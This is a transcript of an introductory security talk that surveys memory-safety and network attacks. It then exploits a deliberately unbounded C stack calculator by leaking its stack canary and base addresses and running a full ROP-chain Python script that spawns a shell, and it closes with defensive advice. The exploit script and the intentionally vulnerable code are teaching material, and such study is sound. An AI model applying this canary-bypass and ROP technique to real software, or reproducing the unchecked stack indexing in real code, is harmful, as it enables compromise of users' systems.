# THE INVISIBLE ENEMIES

> A transcript of the talk given on 2022-05-16.
> [name=SaVA]

## 1. Introduction

Hey everyone!

### The defensive mindset

A programmer's job is to solve problems with code. They do so by butting heads with the many things that go awry, having their assumptions turn out wrong and rectifying them, trying to evade the protests of the inner procrastinator and meeting the deadlines. Woah, this isn't easy, I should say! But common to all the things I listed is the defensive mindset. Making sure things actually work means you have to come up with a thousand ways they could fail and guard against those.

### Going offensive

Here we're going to take a break from all that and go offensive: finding other people's problems and using them to your advantage against the poor guy who brought them into this damned world.

### Vulnerabilities

The problems we're going to be talking about are called vulnerabilities. A vulnerability is basically a kind of bug that breaks the safety assumptions of a program. People use them to do some nasty things: encrypting files, running attacker-provided code, disclosing secrets, spying on your messages, you name it! We call that **exploiting** the bug. Some people manage to shut down whole facilities by exploiting such vulnerabilities.

### You (and the things you love) are under attack!

As long as there are buggy programs being made... scratch that, as long as there are programs being made, we're going to have some people poke at them and wonder how they can hack them. Put simply, they're looking around for how they can exploit a bug for their gain. That's called **attacking** a program.

So, to reiterate:

- A **vulnerability** is a bug that presents security problems.
- By **attacking** a program, you use, or **exploit**, its vulnerabilities to make the program do undesired or unexpected things.
- An **attack** is a way to break a security defense by exploiting a vulnerability.
- An **exploit** is a program that chains attacks to break another program.
- And a **mitigation** is a security measure designed to prevent, or at least hinder, vulnerability exploitation, usually by fixing a bug.

### Common targets

People like to break...

- browsers!
- operating systems! Linux, too, contrary to what you might've been told!
- mail clients!
- document editors!
- image viewers!
- your home routers!
- text messengers!
- even fax machines, and cars, and light bulbs!
- and other things, especially those you expect the least to misbehave!

### How do they do it?

That's rather worrying. How do they do it, though? And so we've got to the question we hope to answer today.

- First, we'll cover some theory on **common vulnerabilities and attacks**.
- Then we'll turn to practice and actually **break a small program** to show how it's done!
- Finally, we'll tell you how you can **reduce damage from** attacks or **avoid** them altogether.

We've got much to cover in so little time, so bear with us and let's go!

## 2. Vulnerabilities and attacks

All right, the first thing we'll talk about is what kinds of vulnerabilities there are. Actually, there is an unbounded variety of those, so we'll just list a few common ones so that you have a basic idea about them.

### Buffer overflow

First of all, a buffer overflow vulnerability. Also called a buffer overrun, it occurs when the volume of data exceeds the capacity of a memory buffer. As a result, the program attempting to write the data to the buffer overwrites bytes outside it. These bytes may be pointers to functions, which are called afterwards, or the return address, which is just a special kind of such a pointer, so the attacker can make a program do something unexpected.

### Use after free

Next is a use-after-free vulnerability. Say a program frees some memory but keeps a pointer to it, which is now dangling. If it dereferences the pointer immediately afterwards, probably nothing bad will happen, since the data is still there.
But suppose the memory allocator happens to reuse this chunk of memory for another object. The dangling pointer will then reference this new data. Now if the attacker controls the contents of the new object, they also control what the dangling pointer sees and can make it look like anything they want.

### Double free

And the last of the memory bug triad is double free. Usually, calling `free` twice with the same argument gets a program to blow up. But the checks aren't absolute and can be bypassed. And what does `free` actually do? It adds the chunk to a list of free chunks, and a double free makes the same allocation appear there twice. Then two calls to `malloc` could return the same pointer. Those could happen in completely unrelated parts of the program, and if the attacker controls one of the allocations, they again can change the other object's data.

### MITM

Now let's talk about networking-related hazards. As you know, for a packet to reach the other end of a connection, it has to hop through several routers. A malevolent router in the middle of that chain can intercept the traffic and replace the packets, insert malicious data, or drop them altogether without the end parties noticing! This is called a **man-in-the-middle** attack.

By the way, there's the TLS protocol that protects you from this. It's also why browsers show you a lock icon in the address bar: they want to boast about using TLS!

### Replay attack

A replay attack is a specific kind of MITM attack. Say we did everything by the book and encrypted the traffic, and now no one can tamper with it. Imagine a certain malicious Mallory intercepting the messages going over the wire. Mallory can't decrypt the packets, but she can instead just send a packet twice. Now imagine the packet asked a bank to wire $300 to my account: I'll get $600! Nifty! Or, if you're hell-bent on being realistic, the packet could order a smart door to open remotely. Not cool.

TLS also protects you from that, by the way.
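
To make the replay idea a bit more tangible, here's a toy sketch of one common defense: number every message and authenticate the number together with the payload, so a copy of an old packet gets turned away. This is loosely in the spirit of the per-record sequence numbers TLS keeps, but it's an illustration only, not how TLS is actually implemented. `KEY`, `seal`, and `Receiver` are made-up names, and the shared key is assumed to have been agreed on beforehand.

```python
import hashlib
import hmac

# Hypothetical pre-shared key; a real protocol would negotiate one per session.
KEY = b"shared-secret-for-the-demo"
TAG_LEN = 32  # size of an HMAC-SHA256 tag in bytes


def seal(seq: int, payload: bytes) -> bytes:
    """Prefix the payload with a sequence number and append a MAC over both."""
    header = seq.to_bytes(8, "big")
    tag = hmac.new(KEY, header + payload, hashlib.sha256).digest()
    return header + payload + tag


class Receiver:
    """Accepts each sequence number exactly once, in order."""

    def __init__(self) -> None:
        self.next_seq = 0

    def accept(self, packet: bytes) -> bool:
        header, payload, tag = packet[:8], packet[8:-TAG_LEN], packet[-TAG_LEN:]
        expected = hmac.new(KEY, header + payload, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):
            return False  # forged or modified packet
        if int.from_bytes(header, "big") != self.next_seq:
            return False  # replayed (or reordered) packet
        self.next_seq += 1
        return True


receiver = Receiver()
packet = seal(0, b"wire $300")
print(receiver.accept(packet))  # True: first delivery goes through
print(receiver.accept(packet))  # False: Mallory's second copy is rejected
```

Mallory still can't read or change anything, and now resending a packet doesn't work either, because the receiver has already moved past that sequence number.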
### Downgrade attack

Yet another specific kind of MITM is the venerable downgrade attack. Think about the email system for a moment. It's historically been all in plaintext. The people who made it didn't care about privacy in the slightest, but then times changed and people got smarter. They started to think about how they could protect the mail. Unfortunately, the mail protocol was too widespread to just ditch it in favor of a better one, so they instead added a command literally called `STARTTLS`. TLS is a secure protocol, so it should be fine, right? Well, except that, if Mallory sits in the middle of the connection and strips the packets of this command, TLS won't happen and the mail will be, again, sent in plaintext. Well done.

I guess that's enough vulnerabilities for now. There are many more, but we won't be talking about them. If you're interested, we'll give you a link at the end to an article where you can learn more.

## 3. Hacking apart a... calculator

As for us, though, given that you're now quite well-versed in the ways of vulnerabilities and attacks, let's put the theory into practice! Today's victim is going to be a stack calculator. Please have a look at it:

```c=
#include <stdio.h>

enum {
    STACK_MAX = 10,
};

int main()
{
    int stack[STACK_MAX] = {0};
    int idx = 0; /* where the next number is pushed; never bounds-checked */

    while (1) {
        char command = -1; /* stays -1 if scanf hits end of input */

        printf("command (><+): ");
        scanf(" %c", &command);

        switch (command) {
        case '>': { /* push; braces keep the declaration valid in pre-C23 C */
            int n = -1;
            scanf(" %d", &n);
            stack[idx++] = n;
            printf("pushed [%d] = %d\n", idx - 1, n);
            break;
        }

        case '<': /* pop */
            --idx;
            printf("popped [%d] -> %d\n", idx, stack[idx]);
            break;

        case '+': { /* replace the top two numbers with their sum */
            int x = stack[--idx];
            int y = stack[--idx];
            stack[idx++] = x + y;
            printf("[%d] = %d + %d = %d\n", idx - 1, x, y, x + y);
            break;
        }

        case -1:
            goto out;
        }
    }

out:
    return 0;
}
```

Please do look at the code attentively. What follows is going to be pretty hard to understand if you've never heard about the topic before, so be prepared.
Anyway, looking at it, you see you can push a number (`>`), you can pop it (`<`), or add the top two numbers together (`+`): pretty basic stuff. `stack` here is the number stack, and `idx` is the cursor position where a new number is pushed to. Note how the bounds are not enforced in any way. We'll be using, or, rather, abusing that heavily. Let's see how.

### 3.1. Theory: conceiving the exploitation path

#### What is... a function call

As you know, the basic idea of a function call is:

- you save the return address,
- and jump to the first instruction of the function.

Then, to return from the called function, we just restore the clobbered registers and jump to the return address.

#### Getting lost on the way back

`main` is one such called function. What if we rewrite *its* return address? Sure, it won't return to its caller, but will go elsewhere: to a function of our choice as an attacker!

#### Pushing trouble out of the room

What will assist us in our crime is the fact that the return address is stored on the stack alongside the `stack` variable. So, by going out of the array bounds, we'll get to the return address and overwrite it using the calculator's `>` command.

### 3.2. Reconnaissance and mitigation bypass

The idea is ripe, now let's gather the data.

#### Inspecting the stack

We'll need to understand the stack layout, that is, where exactly things are in memory. For that we'll use `gdb`.

![](https://i.imgur.com/PnsL0Kt.png)

All right, we found the address of the buffer and know where the program stack is located in its address space. Let's... let's just dump the whole contents of the stack.

```
(gdb) dump memory stack.mem 0x7ffdcc096000 0x7ffdcc0b7000
```

We have to map the addresses in the program to the offsets within the dump file.
For instance, we want the address of the `stack` buffer relative to the stack start address; plugging them into a calculator gets:

```
0x7ffdcc0b5050 - 0x7ffdcc096000 = 0x1f050
```

Which means if we open the dump and go to this offset, we'll see the contents of the buffer.

Now we should find out where the return address is:

```
(gdb) info frame
Stack level 5, frame at 0x7ffdcc0b5090:
 rip = 0x560347b691d2 in main (main.c:16); saved rip = 0x7ff1e92f9b25
 caller of frame at 0x7ffdcc0b5030
 source language c.
 Arglist at 0x7ffdcc0b5080, args:
 Locals at 0x7ffdcc0b5080, Previous frame's sp is 0x7ffdcc0b5090
 Saved registers:
  rbp at 0x7ffdcc0b5080, rip at 0x7ffdcc0b5088
```

`rip` is the instruction pointer, and saved `rip` is its value prior to the call. Hey, that's the return address! And apparently it's stored at `0x7ffdcc0b5088`. Let's compute its relative address too:

```
0x7ffdcc0b5088 - 0x7ffdcc096000 = 0x1f088
```

Rinse and repeat! We do all that for the other variables and see the whole scene of what's happening. For that let's finally open the file `stack.mem`. It's binary, so we'll use a hex dumper (`xxd` here):

```
$ xxd stack.mem | less
```

![](https://i.imgur.com/9D23zQY.png)

I went ahead and colored the regions of interest.

#### The stack smashing protection

##### Getting back on track

Okay, you remember where we were going with this? We overwrite that red-brick-colored area, that is, the return address, with something else and have it pwned. And the writing will be done by the ever helpful `>` command. That's it, right?
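
Before we find out, here's the address arithmetic from the reconnaissance above as a quick Python sketch, in case you'd rather not punch hex into a calculator. The three addresses are the ones from the `gdb` session; the 4-byte `int` is an assumption (true for amd64 Linux), and the variable names are made up for illustration.

```python
INT_SIZE = 4  # assumption: sizeof(int) == 4, as on amd64 Linux

stack_region_start = 0x7ffdcc096000  # first address passed to `dump memory`
buf_addr = 0x7ffdcc0b5050            # address of the `stack` array
ret_addr = 0x7ffdcc0b5088            # where gdb says the saved rip is stored

# Offsets into stack.mem, i.e. where to look in the hex dump.
buf_offset = buf_addr - stack_region_start
ret_offset = ret_addr - stack_region_start

# Which calculator slot aliases the return address.
ret_index = (ret_addr - buf_addr) // INT_SIZE

print(hex(buf_offset))  # 0x1f050
print(hex(ret_offset))  # 0x1f088
print(ret_index)        # 14
```

So, under that assumption, the 8-byte return address sits where `stack[14]` and `stack[15]` would be, four slots past the end of the ten-element array.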
##### Not really

```
$ ./calc
command (><+): >0
pushed [0] = 0
command (><+): >1
pushed [1] = 1
command (><+): >2
pushed [2] = 2
command (><+): >3
pushed [3] = 3
command (><+): >4
pushed [4] = 4
command (><+): >5
pushed [5] = 5
command (><+): >6
pushed [6] = 6
command (><+): >7
pushed [7] = 7
command (><+): >8
pushed [8] = 8
command (><+): >9
pushed [9] = 9
command (><+): >10
pushed [10] = 10
command (><+): ^D
*** stack smashing detected ***: terminated
[1]    3922542 abort (core dumped)  ./calc
```

...no, hang on, we'd expect it to segfault because we jumped into the wilderness, not abort on us like that. It seems something went wrong and our criminal desires got suppressed.

##### The one angry bird

You know who's at fault? I know! This one's the culprit!!!

![](https://imgur.com/blwullk.png)

Well, okay, the thing is, this kind of attack, called **stack smashing**, is as ancient as the Great Wall of China, and thankfully people have got smarter since then, if only a little bit. In particular, they've devised a protection against it, called a *canary*.

##### How It's Made: The Bird

A **canary** is a unique sequence of bytes which immediately follows an array allocated on the stack in our C programs. The compiler injects code that writes the canary value into memory at the beginning of a function, and it also places a check before every single `ret` instruction.

The idea here is that if we overflow a stack buffer, we'll corrupt the canary bytes. And then, when the process performs the check, it'll find some trash where the canary was supposed to be, and it'll set the program on fire. The `ret` instruction, therefore, won't be run, and the attack is averted, at the cost of the program getting blown up.

##### Spotting the spies above

Let's cast our minds back to the stack layout chart. Here I've painted the canary in blueish green.

![](https://i.imgur.com/8LKQpQi.png)

Notice something off? Yeah, right, there's an identical clone of the birdie on the stack!
The one on the bottom is where we'd expect to find it: immediately following our stack array. The other one, though?

Every stack buffer is embellished with a canary, but it just so happens that the canary value is generated once... and then reused. So what happened is, the program called a function, namely `scanf`, that allocated a stack buffer; it got embossed with the canary, and then the function returned and didn't clean it up.

And thanks to our `<` (pop) calculator command, we can go arbitrarily far *behind* the array, eventually reaching this canary twin. And then we get the secret bytes. The bird is defeated. May its soul rest in pieces.

#### Address space layout randomization

The other problem is, we don't know the addresses to jump to. When a program is loaded into memory, all the addresses are shifted by a constant value, called the **base address**. So we find an address in the program binary and jump there, but the actual address will be different, and we'll end up with an utter failure.

Unfortunately for us, this offset is sufficiently random. We can't guess it, so we've gotta find it.

##### Search and rescue

The approach we'll take is similar to how we bypassed the canary. Let's squint our eyes quite a bit and sift through the stack dump. We want to find an address pointing within the loaded, say, `libc` memory region, from which we could then derive the base address.

In our case `libc` got loaded to `0x7ff1e92d2000`. Let's look for addresses close to it on the stack. And likewise for the `calc` program itself, while we're at it.

![](https://i.imgur.com/tHqejZf.png)

We get:

- <span style="background: #ebffb8ff;"><code>__isoc99_scanf+178</code></span>, which is `0x596e2` into `libc`
- <span style="background: #ba86ffff;"><code>main+121</code></span>, which is `0x11d2` into `calc`

Subtracting each offset from the corresponding address we read off the stack gives the base, so now we hold the **base addresses** in our hands. The last stronghold has been overcome.

### 3.3. The exploit; demo

#### COURSE CLEAR

The course is clear!
We've outwitted address randomization and slain the canary by flying beyond the array boundaries. Are we done?

#### But the princess is in another castle...

Not really. The program can jump anywhere we want, but it won't carry any data to the called function. On amd64 we pass data to functions via registers, which is a world away from the stack that we control. To get the data from the stack to a register, we have to use a `mov` or a `pop` or something, and I don't see these instructions lying around on our way to the `ret` instruction.

#### Taking a detour

The kind of instructions we want, namely `mov` and `pop`, is what you'd expect to find in the *epilogue* of a function. Before a function returns, it restores registers to their previous values, which were saved to the stack before they were used. So instead of going straight to the desired function, we'll make a detour through some other procedures so that their epilogues restock our registers with something more useful.

#### Observe the wise ones

Now think about Irtegov's lectures. Some smart people would rather die than listen to him, but still want to appear present. What do they do? The attendance is marked at the end of a lecture, so they just ditch it and come there at the very end, hide among the crowd, get in the line, and swipe the pass over the reader.

#### Supply and demand

Let's heed their wisdom. Since we can choose where to jump, we may as well skip the unnecessary things and jump right to the end of some procedure. We'd supply the values for the `pop` instructions by going even further beyond the return address on the stack, and they'd end up in the registers!

#### Forging a chainmail

And, what's more, after all the `pop`s we'll find a `ret`, which pops an address from the stack and jumps there. That means we can send the processor somewhere again if one jump was not enough.
A sequence of instructions ending with `ret` is called a **gadget**, and we're essentially linking them together to get what's called a **ROP chain**, where ROP stands for **return-oriented programming**.

#### A quest for the missing link

All that's left is to find a ROP chain, then. It should prepare the registers and call the final function. Here we'll be making a `syscall` of `execve("/bin/sh", (char *[]) {NULL}, (char *[]) {NULL})`.

How do we find the right sequence of jumps? Well, we could go over every function we have in our program (including the standard C library it's linked to), look at the epilogues, and stitch them together somehow. Luckily, there's an easier way, since we've got the tools to do this.

#### Ropper

The program we'll use is called `ropper`. It's written in Python and very easy to use:

```
$ ropper -f ./calc /lib/libc-2.33.so --chain execve
```

It'll crunch the binaries and spit out Python code that generates the payload that we'll write on the stack.

#### Demo

After we tweak it a little, we get an `exploit.py` that looks something like this:

```python=
#!/usr/bin/env python

from struct import iter_unpack, pack, unpack

def i64_from_parts(lo, hi):
    # glue two 32-bit calculator slots into one 64-bit value
    return unpack('@Q', pack('@ii', lo, hi))[0]

p = lambda x: pack('Q', x)

# how many slots below the array we read
N = 66

print("RUN: >100<" + "<" * N)
print("INPUT: program output; terminated by double lf")

lines = []

while line := input():
    lines.append(line)

# skip the output of the initial push and pop of 100
lines = lines[2:]
values = [int(line.rsplit(' ')[-1]) for line in lines]
assert len(values) == N

# i
# (this slot appears to be `idx` itself; it must read -2 right after it is written back)
values[2] = -2

canary = i64_from_parts(values[57], values[56])
libc_addr = i64_from_parts(values[65], values[64])
prog_addr = i64_from_parts(values[9], values[8])

prog_base = prog_addr - 0x11d2
# *rebases* an address *x* by adding the base address of ./calc (prog_base)
rebase_0 = lambda x: p(x + prog_base)

libc_base = libc_addr - 0x5ec42
# likewise for libc
rebase_1 = lambda x: p(x + libc_base)

print('libc: 0x{:x}'.format(libc_base))
print('prog: 0x{:x}'.format(prog_base))

rop = b''

# buffer
rop += p(0x0000000000000000)
rop += p(0x0000000000000000)
rop += p(0x0000000000000000)
rop += p(0x0000000000000000)
rop += p(0x0000000000000000)

# canary and padding
rop += p(canary)
rop += p(0x0000000000000000)

rop += rebase_0(0x0000000000001134) # 0x0000000000001134: pop rbp; ret;
rop += b'//bin/sh'
rop += rebase_1(0x000000000002d52a) # 0x000000000002d52a: pop r12; ret;
rop += rebase_0(0x0000000000004030)
rop += rebase_1(0x00000000000a3868) # 0x00000000000a3868: mov qword ptr [r12], rbp; pop rbp; pop r12; pop r13; pop r14; ret;
rop += p(0x0000000000000000)
rop += rebase_0(0x0000000000004038)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_1(0x00000000000a3868) # 0x00000000000a3868: mov qword ptr [r12], rbp; pop rbp; pop r12; pop r13; pop r14; ret;
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x0000000000001373) # 0x0000000000001373: pop rdi; ret;
rop += rebase_0(0x0000000000004030)
rop += rebase_1(0x000000000002f181) # 0x000000000002f181: pop rsi; ret;
# ! ropper mistakenly uses rebase_1 here...
rop += rebase_0(0x0000000000004038)
rop += rebase_1(0x000000000010c4f7) # 0x000000000010c4f7: pop rdx; pop r12; ret;
# ! ...and here (cf. its output above)
rop += rebase_0(0x0000000000004038)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_1(0x0000000000045480) # 0x0000000000045480: pop rax; ret;
rop += p(0x000000000000003b)
rop += rebase_1(0x000000000008a386) # 0x000000000008a386: syscall; ret;

print("RUN:")

# push the values we read back in, walking idx up to 0 again
for i in reversed(values):
    print('>{}'.format(i), end='')

# then push the payload, one 32-bit slot at a time
for (i,) in iter_unpack('@i', rop):
    print('>{}'.format(i), end='')

print()
```

If you want to explore it, we can give you a link to it later, but now we're gonna skip the details and just demo it.

#### How it works

Just so that you have an idea of what's happened, we'll go step-by-step and see what's going on in the program.
> IMG: 01-leave

So the program is at the penultimate instruction of `main`. `leave` just moves `rbp` to `rsp` and pops `rbp`.

> IMG: 02-ret

We're at the `ret` instruction, and `rsp` points to the first entry of the ROP chain.

> IMG: 03-pop-rbp

It pops the 8-byte value, which is `//bin/sh`, off the stack into `rbp`. The extra leading slash is there to make it 8 bytes long.

> IMG: 04-ret

Again, a `ret` instruction leads us to the next instruction, somewhere in `libc`.

> IMG: 05-pop-r12

There's an area in the memory for global variables, and it's writeable. We'll be preparing the data there, so we pop its address to `r12`. The affected area is displayed on the left, by the way.

> IMG: 06-ret

Another `ret`...

> IMG: 07-mov-qword-ptr-r12-rbp

Here we move the value of `rbp`, which is `//bin/sh`, to the address pointed to by `r12`, which is the global variable area we talked about. Watch the memory now...

> IMG: 08-pop-rbp

It was all zeroes and now it's `//bin/sh`! Now we want an array of `char *` (char pointers) with a single element: a `NULL` pointer. A null pointer is 8 zero bytes, which we load into `rbp`.

> IMG: 09-pop-r12

As well as the address. In the memory view, it points to the second line.

> IMG: 10-pop-r13

There are two more instructions which pop to some registers we don't need. Let's just clobber them with some junk. In our case, that will be `DEADBEEFDEADBEEF` in hexadecimal.

> IMG: 11-pop-r14

> IMG: 12-ret

We want to do another memory write, so we'll jump back to the `mov` at the start of the same gadget.

> IMG: 13-mov-qword-ptr-r12-rbp

Here we go again, but with a slightly different address and data.

> IMG: 14-pop-rbp

The next four instructions are useless to us; we just fill the registers with some junk.

> IMG: 15-pop-r12

> IMG: 16-pop-r13

> IMG: 17-pop-r14

> IMG: 18-ret

We're going to make a `syscall`, which takes its parameters via registers. Let's go ahead and prepare them.

> IMG: 19-pop-rdi

First, the `rdi` register. It stores the first argument of a syscall.
In our case it's the path to the program. We supply the address of the first line displayed in the memory view.

> IMG: 20-ret

A return...

> IMG: 21-pop-rsi

Now it's `rsi`'s turn. `rsi` stores the second argument of a syscall. We set it to the address of an array consisting of only a null pointer.

> IMG: 22-ret

Done here, next one...

> IMG: 23-pop-rdx

`rdx` stores the third argument of a syscall. We'll use the same address we had for `rsi`, the second argument. Apparently it's perfectly legal.

> IMG: 24-pop-r12

There's a useless instruction; we give junk to it. `pop r12` is thrilled with the junk we gave it. `pop r12` is happy.

> IMG: 25-ret

But we move on; we've got one more register to set up!

> IMG: 26-pop-rax

And that's `rax`, which holds the number of the syscall we're going to make. The syscall is `execve`; its number is `59`, or `3b` in hexadecimal.

> IMG: 27-ret

Done with the preparation! Let's go to a syscall instruction!

> IMG: 28-syscall

We're finally there.

- `rax` stores 59, the number of the `execve` syscall.
- `rdi` points to the string `//bin/sh`.
- `rsi` and `rdx` both point to an array of one pointer, which is a null pointer.

Put together, this instruction now executes the equivalent of `execve("//bin/sh", (char *[]) {NULL}, (char *[]) {NULL})`, which is just what we wanted!

And we've got the shell.

## 4. Defense measures

What a scary story we just told you. And it could happen to **your** program. So how do you protect against all this?

### Isolation

Isolate and limit processes as much as possible. If your program doesn't need the network, deny it access to it. Same for files. The less your program can possibly touch, the less likely a disaster is to occur.

### Secret minimization

Store as little sensitive data as you can. You don't need to store passwords, for instance, when hashing will do. After all, a hacker can't get things you don't have, even if they manage to hack you.
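
Here's roughly what "hashing will do" can look like, as a minimal sketch using only Python's standard library. The function names and the iteration count are assumptions made for illustration; a real system should pick the parameters (or a dedicated password-hashing library) according to current guidance.

```python
import hashlib
import hmac
import os

# Illustrative work factor; an assumption, tune it for your hardware.
ITERATIONS = 200_000


def hash_password(password: str):
    """Return (salt, digest); these two are all you store, never the password."""
    salt = os.urandom(16)  # fresh random salt for every password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    """Re-derive the digest from the login attempt and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)


salt, digest = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, digest))  # True
print(verify_password("Tr0ub4dor&3", salt, digest))                   # False
```

If the database leaks, the attacker walks away with salts and digests and still has to guess each password the slow way.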
### Audit

You know how you spend much time looking for a bug, ask other people for help, and they immediately find what's wrong? Same idea: hire an audit company that thoroughly tests and inspects the program for you.

Sometimes the correctness of a program is even proved using formal methods. It's quite slow and costly, so it's not used much in practice, save for a few specific, safety-critical industries; for instance, formal verification is widespread in the hardware design industry.

### Using ready-made cryptographic systems

Don't invent your own crypto! Use libraries made by other, trustworthy people. After all, they already went through all the trouble to ensure security.

### Updates

Finally, updates. A program often has a ton of dependencies, and each may have the same problems we just talked about. Good news: virtuous people regularly report these problems and fix them. Bad news: you have to update a vulnerable dependency to profit from that.

Staying up-to-date won't protect against vulnerabilities still unknown, but it at least forces the attacker to spend time studying the program instead of exploiting already known bugs.

The list is not exhaustive, and there are many more ways to guard against attackers. But simply doing all of the things above can significantly reduce the attack surface of your programs and deter hackers, except for the most stubborn ones, from targeting you. I consider that a good thing, and you should too.

## 5. Conclusion

The final part! We've told you about attacks, vulnerabilities, and security measures. We even went as far as to actually hack a program, although a contrived one.

Hopefully some of what we said has stuck in your mind, so that you're less likely to become the cause of the next cybersecurity disaster. But in case it didn't, don't fret or panic; we've got you covered with plenty of reading you can do in your spare time if the need arises.
For a detailed overview of vulns and defenses, see [this article](https://hackmd.io/@slowlime/SyNPM-r-9). And the step-by-step guide to hacking a calculator, basically what we've shown you, is available [here](https://hackmd.io/@slowlime/SJfRzQqeq). We'll also publish a transcript of our talk!

And now that's all we had for you today. Thanks for listening!